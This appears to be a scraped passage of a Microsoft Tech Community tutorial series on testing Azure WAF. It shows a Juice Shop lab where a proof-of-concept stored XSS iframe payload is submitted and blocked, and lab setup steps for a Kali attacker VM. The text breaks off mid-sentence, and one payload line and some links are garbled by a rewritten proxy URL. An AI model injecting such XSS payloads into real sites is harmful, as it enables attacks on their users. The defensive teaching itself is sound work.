<P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; To see the latest request/response, sort by #</FONT></LI> </UL> <P>&nbsp;</P> <OL start="3"> <LI>In the browser window, click on the website menu icon on the top left and then click on <STRONG>Customer Feedback</STRONG></LI> <LI>In the <STRONG>Comment </STRONG>box of the <STRONG>Customer Feedback</STRONG> form, copy/paste the POC code<LI-CODE lang="javascript">&lt;iframe src="https://gorovian.000webhostapp.com/?exam=x-javascript&amp;colon;alert(`xss`)"&gt;</LI-CODE></LI> <LI>Give a <STRONG>Rating,</STRONG> respond to the <STRONG>CAPTCHA </STRONG>challenge and click <STRONG>Submit</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_4-1609800602375.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244093iDFDF240CBF4A037E/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_4-1609800602375.png" alt="Mohit_Kumar_4-1609800602375.png" /></span></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">6. Upon clicking <STRONG>Submit, </STRONG>you will observe that the thank you message does not&nbsp;show up this time</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip: &nbsp;</STRONG>The web application does not provide an error response in this scenario.&nbsp; This is due to the behavior of the Juice Shop application</FONT></LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">7. Switching back to Burp, we can see the following request and response for the Feedback that we submitted in Step 5 above</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 1 – Request with XSS Payload in Burp Suite</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609800801345.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244094i44BDF2E55074AD3E/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609800801345.png" alt="Mohit_Kumar_0-1609800801345.png" /></span></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 2 – 403 Forbidden Response from Application Gateway in Burp Suite</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609800816806.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244095i27E31D484FB5F33B/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609800816806.png" alt="Mohit_Kumar_1-1609800816806.png" /></span></P> <P>&nbsp;</P> <P><FONT size="2"><STRONG>Raw Request and Response - Headers and Body</STRONG></FONT></P> <TABLE border="1" width="99.86187845303868%"> <TBODY> <TR> <TD width="49.58563535911602%"> <P><FONT size="2"><STRONG>Request</STRONG></FONT></P> </TD> <TD width="50.27624309392266%"> <P><FONT size="2"><STRONG>Response</STRONG></FONT></P> </TD> </TR> <TR> <TD width="49.58563535911602%"> <P><FONT size="2">POST /api/Feedbacks/ HTTP/1.1</FONT></P> <P><FONT size="2">Host: juiceshopthruazwaf.com</FONT></P> <P><FONT size="2">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0</FONT></P> <P><FONT size="2">Accept: applicationhttps://techcommunity.microsoft.com/json, text/plain, */*</FONT></P> <P><FONT size="2">Accept-Language: en-US,en;q=0.5</FONT></P> <P><FONT size="2">Accept-Encoding: gzip, deflate</FONT></P> <P><FONT size="2">Referer: <A href="#" target="_blank" rel="noopener">http://juiceshopthruazwaf.com/</A></FONT></P> <P><FONT size="2">Content-Type: applicationhttps://techcommunity.microsoft.com/json</FONT></P> <P><FONT size="2">Content-Length: 107</FONT></P> <P><FONT size="2">Cookie: io=ygD2rhS_-3S5-Q_vAAF2; language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss</FONT></P> <P><FONT size="2">Connection: close</FONT></P> <P>&nbsp;</P> <P><FONT size="2">{"captchaId":14,"captcha":"-6","comment":"<STRONG>&lt;iframe src=\"javascript&amp;colon;alert(`xss`)\"&gt;</STRONG> (anonymous)","rating":3}</FONT></P> </TD> <TD width="50.27624309392266%"> <P><FONT size="2">HTTP/1.1 403 Forbidden</FONT></P> <P><FONT size="2">Server: Microsoft-Azure-Application-Gateway/v2</FONT></P> <P><FONT size="2">Date: Sun, 11 Oct 2020 02:26:32 GMT</FONT></P> <P><FONT size="2">Content-Type: text/html</FONT></P> <P><FONT size="2">Content-Length: 179</FONT></P> <P><FONT size="2">Connection: close</FONT></P> <P>&nbsp;</P> <P><FONT size="2">&lt;html&gt;</FONT></P> <P><FONT size="2">&lt;head&gt;&lt;title&gt;<STRONG>403 Forbidden</STRONG>&lt;/title&gt;&lt;/head&gt;</FONT></P> <P><FONT size="2">&lt;body&gt;</FONT></P> <P><FONT size="2">&lt;center&gt;&lt;h1&gt;<STRONG>403 Forbidden</STRONG>&lt;/h1&gt;&lt;/center&gt;</FONT></P> <P><FONT size="2">&lt;hr&gt;&lt;center&gt;<STRONG>Microsoft-Azure-Application-Gateway/v2</STRONG>&lt;/center&gt;</FONT></P> <P><FONT size="2">&lt;/body&gt;</FONT></P> <P><FONT size="2">&lt;/html&gt;</FONT></P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <OL start="8"> <LI>The <STRONG>403 Forbidden</STRONG> response from the <STRONG>Application Gateway</STRONG> tells us that the request with the POC XSS payload was blocked by <STRONG>Azure WAF</STRONG></LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Understanding What Happened&nbsp;</H2> <P>&nbsp;</P> <P>Upon reviewing the HTTP requests and responses for the two attempts to inject POC XSS payload to the same instance of the Juice Shop application, we see the pattern as shown in the below table.&nbsp; This clearly indicates that the malicious XSS payload which could otherwise be stored in the application is not allowed through by Azure WAF.</P> <P>&nbsp;</P> <TABLE border="1" width="99.86187845303867%"> <TBODY> <TR> <TD width="50%"> <P><STRONG>XSS Exploitation Route</STRONG></P> </TD> <TD width="49.86187845303867%" class="lia-align-center"> <P><STRONG>Success</STRONG></P> </TD> </TR> <TR> <TD width="50%"> <P>Direct</P> </TD> <TD width="49.86187845303867%" class="lia-align-center"> <P>Yes</P> </TD> </TR> <TR> <TD width="50%"> <P>Through WAF</P> </TD> <TD width="49.86187845303867%" class="lia-align-center"> <P>No</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Now let us use the <A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A> to understand how the WAF handled traffic with the <STRONG>XSS payload</STRONG>.&nbsp; This workbook visualizes security relevant WAF events across several filterable panels.&nbsp; <EM>It works with all WAF types, including Application Gateway, Front Door, and CDN, and can be filtered based on WAF type or a specific WAF instance.</EM></P> <P>&nbsp;</P> <P><A title="Deploy Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Click here</A> to deploy <STRONG>Azure Monitor Workbook for WAF</STRONG> to your subscription in Azure.</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>: &nbsp;To understand what is happening when traffic with XSS payload destined for the Juice Shop application goes through the Azure WAF, you can also examine the log entries associated with <STRONG>ApplicationGatewayFirewallLog </STRONG>in the<STRONG> Azure Monitor</STRONG></FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H3><FONT size="3">Reviewing WAF logs in the Workbook</FONT></H3> <P>&nbsp;</P> <OL> <LI>You can access the WAF workbook by going into the Workbook blade and then selecting the WAF workbook deployed for this testing.&nbsp; Once in the workbook, ensure that you have selected the appropriate <STRONG>Time Range</STRONG>, <STRONG>WAF Type and WAF Items</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609801204836.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244099iC5A7EDFC78351249/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609801204836.png" alt="Mohit_Kumar_0-1609801204836.png" /></span></P> <P>&nbsp;</P> <OL start="2"> <LI>You should also ensure that you have selected the correct Public IP address for your attacker machine (Kali VM) in the <STRONG>Top 10 Attacking IP Addresses, filter to single IP address </STRONG>pane</LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; If you are using the <SPAN>Azure WAF Attack Testing Lab Environment Deployment Template</SPAN> and have followed the lab setup instructions then the client IP address will be the public IP address of the Azure Firewall in your demo environment</FONT></LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609894963883.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244443iE4540EFF84613A75/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609894963883.png" alt="Mohit_Kumar_0-1609894963883.png" /></span></P> <P>&nbsp;</P> <OL start="3"> <LI>After selecting the correct client IP, we scroll back up to the top of the Workbook and review the visualizations at the top, in the WAF Workbook.&nbsp; <SPAN>Following are the sections of the workbook we will be using as called out in the figure&nbsp;below </SPAN></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. WAF actions filter</P> <P class="lia-indent-padding-left-60px">b. Top 40 Blocked Request URI addresses, filter to single URI address</P> <P class="lia-indent-padding-left-60px">c. Top 50 event trigger, filter by rule name</P> <P class="lia-indent-padding-left-60px">d. Message, full details</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609895311056.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244446iF737E62BFC002587/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609895311056.png" alt="Mohit_Kumar_1-1609895311056.png" /></span></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Note</STRONG>:<STRONG>&nbsp; </STRONG>For a detailed overview of these sections of the WAF workbook, please refer to the<STRONG> Overview of the Workbook Sections</STRONG> in the previous tutorial, <A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_self">Reconnaissance Playbook</A></FONT></P> <P>&nbsp;</P> <OL start="4"> <LI>From the sliced data in the WAF workbook, we can see that two requests to the <STRONG>/api/Feedbacks/</STRONG> URI were blocked by WAF.&nbsp; Upon reviewing the <STRONG>Top 50 event trigger, filter by rule name </STRONG>we see all the rules which evaluated the POC XSS payload in the request; the <STRONG>Message, full details </STRONG>section shows that the traffic was blocked by Mandatory rule because the Anomaly Score threshold was exceeded <STRONG>(Total Score: 53, XSS=35)</STRONG> with XSS attack being the closest match</LI> <LI>The below table shows an extract of the <STRONG>Top 50 event trigger, filter by rule name </STRONG>output for request with the XSS traffic.&nbsp; This data shows that the WAF evaluated the POC payload in the HTTP request to detect XSS injection and therefore blocked it</LI> </OL> <P>&nbsp;</P> <TABLE border="1" width="99.86187845303867%"> <TBODY> <TR> <TD width="89.77900552486187%" height="30px"> <P><STRONG>Rule</STRONG></P> </TD> <TD width="10.082872928176796%" height="30px"> <P><STRONG>count_</STRONG></P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>Remote Command Execution: Unix Shell Expression Found</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>XSS Attack Detected via libinjection</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>XSS Filter - Category 4: Javascript URI Vector</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>NoScript XSS InjectionChecker: HTML Injection</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>NoScript XSS InjectionChecker: Attribute Injection</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>IE XSS Filters - Attack Detected.</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>XSS Filter - Category 5: Disallowed HTML Attributes</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>Possible XSS Attack Detected - HTML Tag Handler</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>SQL Injection Attack: SQL Tautology Detected.</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="30px"> <P>Detects basic SQL authentication bypass attempts 3/3</P> </TD> <TD width="10.082872928176796%" height="30px"> <P>1</P> </TD> </TR> <TR> <TD width="89.77900552486187%" height="57px"> <P>Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)</P> </TD> <TD width="10.082872928176796%" height="57px"> <P>1</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Key Takeaway</H2> <P>&nbsp;</P> <P>Cross Site Scripting (XSS) is one of the most common type of application security vulnerability and an external adversary can easily exploit a vulnerable application to compromise the application and its users to elevate their privileges.</P> <P>&nbsp;</P> <P><STRONG>For web applications secured with it, Azure WAF can protect against XSS attacks by detecting and blocking XSS payload at the network edge, with its out of the box ruleset.</STRONG></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="50%"> <H4>Previous: <A style="font-family: inherit; font-size: 18px;" title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_blank" rel="noopener">Reconnaissance Playbook</A></H4> </TD> <TD width="50%"> <H4>Next:&nbsp;<A title="Data Disclosure and Exfiltration Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-4-data-disclosure-and-exfiltration-playbook-azure-waf/ba-p/2031269" target="_blank" rel="noopener">Data Disclosure and Exfiltration Playbook</A></H4> </TD> </TR> </TBODY> </TABLE> <H4>&nbsp;</H4> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Fri, 15 Jan 2021 02:06:06 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047 Mohit_Kumar 2021-01-15T02:06:06Z Part 1 - Lab Setup: Azure WAF Security Protection and Detection Lab https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-waf-security-protection-and-detection-lab/ba-p/2030469 <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Tutorial: Setup an Azure WAF Security Protection and Detection Lab</FONT></H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>The purpose of the Azure WAF security protection and detection lab tutorial is to demonstrate <STRONG>Azure Web Application Firewall (WAF)</STRONG> capabilities in identifying, detecting, and protecting against suspicious activities and potential attacks against your Web Applications.&nbsp; This first tutorial in a four-part series walks you through creating a lab environment for testing against Azure WAF's protections.&nbsp; This lab focuses on the OWASP protection ruleset and logging capabilities of Azure WAF.&nbsp; The lab does not include advanced application security concepts and is not intended to be a reference for application security testing as these areas are broader than the use cases demonstrated herein.&nbsp; For more information about each tutorial in this series, refer to the previous section, <A title="Tutorial Overview" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/tutorial-overview-azure-web-application-firewall-security/ba-p/2030423" target="_blank" rel="noopener">Tutorial Overview</A>.</P> <P>&nbsp;</P> <P>In this tutorial you will:</P> <OL> <LI>Deploy a demo test environment in Azure</LI> <LI>Deploy Azure Monitor Workbook for WAF</LI> <LI>Enable desktop environment on Linux VM</LI> <LI>Create host file entries to resolve host names</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Prerequisites</H2> <P>&nbsp;</P> <OL> <LI>An Azure subscription to deploy the&nbsp;<A title="Azure WAF Attack Testing Lab Environment Deployment Template" href="#" target="_blank" rel="noopener noopener noreferrer noopener noreferrer">Azure WAF Attack Testing Lab Environment Deployment Template</A><BR /> <UL> <LI>Do not have an Azure subscription? <A title="Create a free Azure account" href="#" target="_blank" rel="noopener">Create a free account</A></LI> </UL> </LI> <LI>A Log Analytics workspace to send all diagnostic logs <UL> <LI>Azure Monitor Workbook for WAF deployed to the same workspace</LI> </UL> </LI> <LI>Familiarity with Azure <STRONG>Application Gateway WAF</STRONG></LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Deployment Steps</H2> <P>&nbsp;</P> <OL> <LI><A title="Deploy Azure WAF Attack Testing Lab Environment" href="#" target="_blank" rel="noopener">Click here</A> to deploy the lab environment to your Azure subscription</LI> <LI><A title="Azure Monitor Workbook for WAF " href="#" target="_blank" rel="noopener">Click here</A> to deploy the Azure Monitor Workbook for WAF to your Azure subscription</LI> </OL> <UL class="lia-list-style-type-square"> <LI><STRONG><FONT size="2">Tip:</FONT> &nbsp;</STRONG><FONT size="2">For more information, refer to the detailed deployment instructions here -&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-2-deploying-the/ba-p/1773168" target="_blank" rel="noopener">Deploying Network security demo environment</A></FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="2">Please refer to the above document for deployment instructions only and do not use the deployment template linked in it.&nbsp; The deployment template used in these lab tutorials is different from the one used in the deployment instructions document</FONT></LI> </UL> </LI> </UL> <P><STRONG>&nbsp;</STRONG></P> <P>&nbsp;</P> <H2>Recommendations</H2> <P>&nbsp;</P> <P>We recommend using the&nbsp;<A title="Azure WAF Attack Testing Lab Environment Deployment Template" href="#" target="_blank" rel="noopener noopener noreferrer">Azure WAF Attack Testing Lab Environment Deployment Template</A>&nbsp;as it already contains all the components needed for this lab including a customized version of the OWASP Juice Shop application.&nbsp; The closer your lab is to the suggested lab setup, the easier it will be to follow the Azure WAF testing procedures.&nbsp; After deployment and minimum configuration steps, you will be ready to perform actions with the suggested hacking research tools and review Azure WAF's protections against those malicious actions.&nbsp;</P> <P>&nbsp;</P> <P data-unlink="true">When using the&nbsp;Azure WAF Attack Testing Lab Environment Deployment Template,&nbsp;additional resources such as VMs and Azure Front Door will be deployed. &nbsp;The below diagram represents resources in the environment which are utilized in this lab.&nbsp; The resources which are not used in this lab have been grayed out (VMs, Azure Front Door, DDoS Protection).</P> <P>&nbsp;</P> <P><FONT size="2"><FONT color="#FF0000"><STRONG>!</STRONG></FONT><STRONG> IMPORTANT:</STRONG> &nbsp;This environment will be used as the baseline for the remainder of this document and the tutorial</FONT></P> <TABLE width="634"> <TBODY> <TR> <TD width="634"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609788007370.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/243940iE61E0E98CBEC68D5/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609788007370.png" alt="Mohit_Kumar_1-1609788007370.png" /></span></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>In this setup, traffic from the attacker machine (Kali VM) will be routed to the internet through the Azure Firewall.&nbsp; Successful attack path is one where malicious data is sent directly by the attacker to the <STRONG>OWASP Juice Shop</STRONG> web application leading to successful exploitation.&nbsp; Attack path defended by WAF represents the path where malicious data is inspected by Azure WAF (on Azure Application Gateway) and blocked with its out of the box ruleset before it reaches the web application.</P> <P>&nbsp;</P> <P>You can also use a preexisting environment for this lab. &nbsp;For completing these tutorials, your environment must have the following key components:</P> <P>&nbsp;</P> <OL> <LI>An instance of the customized OWASP Juice Shop web application with an internet accessible endpoint</LI> <LI>An instance of Application Gateway with Azure WAF which publishes the OWASP Juice Shop web application to the internet</LI> <LI>An attacker machine (VM) with common hacking tools and internet connectivity.&nbsp; We use Kali Linux as the attacker VM</LI> </OL> <P>&nbsp;</P> <P>If manually deploying the components required for this tutorial, your complete lab setup should look as similar as possible to the following diagram:</P> <P>&nbsp;</P> <TABLE width="631"> <TBODY> <TR> <TD width="631"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609788486015.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/243942i59D85566B9E8994C/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609788486015.png" alt="Mohit_Kumar_0-1609788486015.png" /></span></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Resources</H2> <P>&nbsp;</P> <P>The below table details the resources needed from all resources deployed with the <A title="Azure WAF Attack Testing Lab Environment Deployment Template" href="#" target="_blank" rel="noopener">Azure WAF Attack Testing Lab Environment Deployment Template</A>.&nbsp;</P> <P>&nbsp;</P> <TABLE border="1" width="99.86187845303867%"> <TBODY> <TR> <TD width="16.574585635359114%"> <P><STRONG>Resource</STRONG></P> </TD> <TD width="25.276243093922652%"> <P><STRONG>Name</STRONG></P> </TD> <TD width="11.464088397790055%"> <P><STRONG>IP Address Type</STRONG></P> </TD> <TD width="46.54696132596685%"> <P><STRONG>Purpose</STRONG></P> </TD> </TR> <TR> <TD width="16.574585635359114%"> <P>Virtual Machine</P> </TD> <TD width="25.276243093922652%"> <P>VM-Kali</P> </TD> <TD width="11.464088397790055%"> <P>Private only</P> </TD> <TD width="46.54696132596685%"> <P>Attacker VM (<A href="#" target="_blank" rel="noopener">Kali Linux</A>) with preinstalled vulnerability and penetration testing tools</P> </TD> </TR> <TR> <TD width="16.574585635359114%"> <P>Firewall</P> </TD> <TD width="25.276243093922652%"> <P>SOC-NS-FW</P> </TD> <TD width="11.464088397790055%"> <P>Private &amp; Public</P> </TD> <TD width="46.54696132596685%"> <P>Azure Firewall for outbound and inbound traffic restrictions and inspection</P> </TD> </TR> <TR> <TD width="16.574585635359114%"> <P>Azure WAF on Application Gateway</P> </TD> <TD width="25.276243093922652%"> <P>SOC-NS-AG-WAFv2</P> </TD> <TD width="11.464088397790055%"> <P>Private &amp; Public</P> </TD> <TD width="46.54696132596685%"> <P>Azure Web Application Firewall preventing threats to the OWASP web application published through Application Gateway</P> </TD> </TR> <TR> <TD width="16.574585635359114%"> <P>OWASP WebApp</P> </TD> <TD width="25.276243093922652%"> <P>owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</P> </TD> <TD width="11.464088397790055%"> <P>Public only</P> </TD> <TD width="46.54696132596685%"> <P><A href="#" target="_blank" rel="noopener">OWASP Juice Shop</A> Application.&nbsp; An open source web application with built in security vulnerabilities and CFT challenges</P> </TD> </TR> </TBODY> </TABLE> <P><FONT style="font-size: small; font-family: inherit;" color="#FF0000"><STRONG>!</STRONG></FONT><STRONG style="font-size: small; font-family: inherit;"> IMPORTANT</STRONG><SPAN style="font-size: small; font-family: inherit;">: &nbsp;For the scenarios demonstrated in this document, OWASP Juice Shop application was running on HTTP port 3000.&nbsp; This is not the case when you use the Azure WAF Attack Testing Lab Environment Deployment Template as it configures the application to run on port 80, 443 and assigns it a URL.&nbsp; For the lab tutorials, you will connect to the application on HTTP port 80 only. &nbsp;The URL for the application will be http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net.&nbsp;&nbsp;</SPAN></P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>: As it is a security best practice, we strongly recommend that you change the default lab password after deployment</FONT></LI> </UL> <P>&nbsp;</P> <H2>Configuration</H2> <P>&nbsp;</P> <P>Additional configuration is required on the Kali Linux VM before getting started on the lab exercises.&nbsp; The Kali VM in this lab environment needs remote desktop environment installed and configured.&nbsp; Please complete the steps in the order outlined below.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H3><FONT size="3">Updating Kali Linux and Installing Desktop Environment</FONT></H3> <P>&nbsp;</P> <OL> <LI>Launch PowerShell on your local machine and run the following command to connect to the Kali VM</LI> </OL> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-60px"><FONT size="3"><STRONG>ssh svradmin@&lt;Public IP Address of Azure Firewall&gt;</STRONG>&nbsp;</FONT></P> <P class="lia-indent-padding-left-60px"><FONT size="3"><STRONG>&lt;</STRONG><EM>Type your password when prompted to login</EM><STRONG>&gt;</STRONG></FONT></P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tips: </STRONG></FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="2">You can find the public IP of Azure Firewall in the Azure Portal under <STRONG>Resource Group --&gt; SOC-NS-FW --&gt; Public IP configuration</STRONG></FONT></LI> <LI><FONT size="2">You can also use <A href="#" target="_blank" rel="noopener">Putty client</A> on your local machine to connect to the Kali VM</FONT></LI> </UL> </LI> </UL> <P>&nbsp;</P> <OL start="2"> <LI>Once connected to the Kali VM with SSH, run the following command to update the Kali Linux distro</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px"><STRONG>sudo apt-get update</STRONG></P> <P class="lia-indent-padding-left-60px"><STRONG>&lt;</STRONG><EM>Type your password when prompted</EM><STRONG>&gt;</STRONG></P> <P><STRONG>&nbsp;</STRONG></P> <OL start="3"> <LI>Once the Kali Linux distro is updated, run the following command to install and configure the remote desktop server on the Kali VM</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a.<STRONG> sudo apt-get -y install xrdp</STRONG></P> <P class="lia-indent-padding-left-60px">b.<STRONG> sudo</STRONG> <STRONG>systemctl enable xrdp</STRONG></P> <P class="lia-indent-padding-left-60px">c.<STRONG> echo</STRONG> <STRONG>xfce4-session &gt;~/.xsession</STRONG></P> <P class="lia-indent-padding-left-60px">d.<STRONG> sudo</STRONG> <STRONG>service xrdp restart</STRONG></P> <P><STRONG>&nbsp;</STRONG></P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip: &nbsp;</STRONG>For more information, refer to the step by step instructions to Install Desktop Environment on Linux VMs - <A title="Install and configure Remote Desktop to connect to a Linux VM in Azure" href="#" target="_blank" rel="noopener">Install and configure Remote Desktop to connect to a Linux VM in Azure</A>&nbsp;</FONT></LI> </UL> <P>&nbsp;</P> <OL start="4"> <LI>Upon completing the abovementioned steps, you should be able to connect to the Kali VM over RDP on port 33892&nbsp;</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. Connect to the Kali VM over RDP by using the following IP address and port combination</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><STRONG>&lt;Public IP Address of Azure Firewall&gt;:33892</STRONG>&nbsp;</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-60px">b. When prompted to choose the setup for the first startup, click to select “Use default config”</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609793055165.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/243952iC3F0CF46FCC97E01/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_0-1609793055165.png" alt="Mohit_Kumar_0-1609793055165.png" /></span></P> <P class="lia-indent-padding-left-60px"><BR />c. You can now close your SSH session to the Kali VM by typing “exit” in the SSH session running in PowerShell</P> <P>&nbsp;</P> <OL start="5"> <LI>Create an entry in the HOSTS file on Kali VM to map a name to the Public IP address of the OWASP Juice Shop site published on Application Gateway</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. Launch Terminal and run the following command</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><STRONG>sudo nano /etc/hosts</STRONG></P> <P class="lia-indent-padding-left-90px"><STRONG>&lt;</STRONG><EM>Type your password when prompted</EM><STRONG>&gt;</STRONG></P> <P><STRONG>&nbsp;</STRONG></P> <P class="lia-indent-padding-left-60px">b. Create the following entry</P> <P class="lia-indent-padding-left-90px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609794465822.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/243988iF9D86A3D4FF5AA80/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_0-1609794465822.png" alt="Mohit_Kumar_0-1609794465822.png" /></span></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">c. Save the hosts file and exit</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><SPAN style="font-family: inherit;">Use <STRONG>Ctrl+S</STRONG> to save and <STRONG>Ctrl+X</STRONG> to exit</SPAN></P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip: &nbsp;</STRONG>You can find public IP of the Application Gateway in the 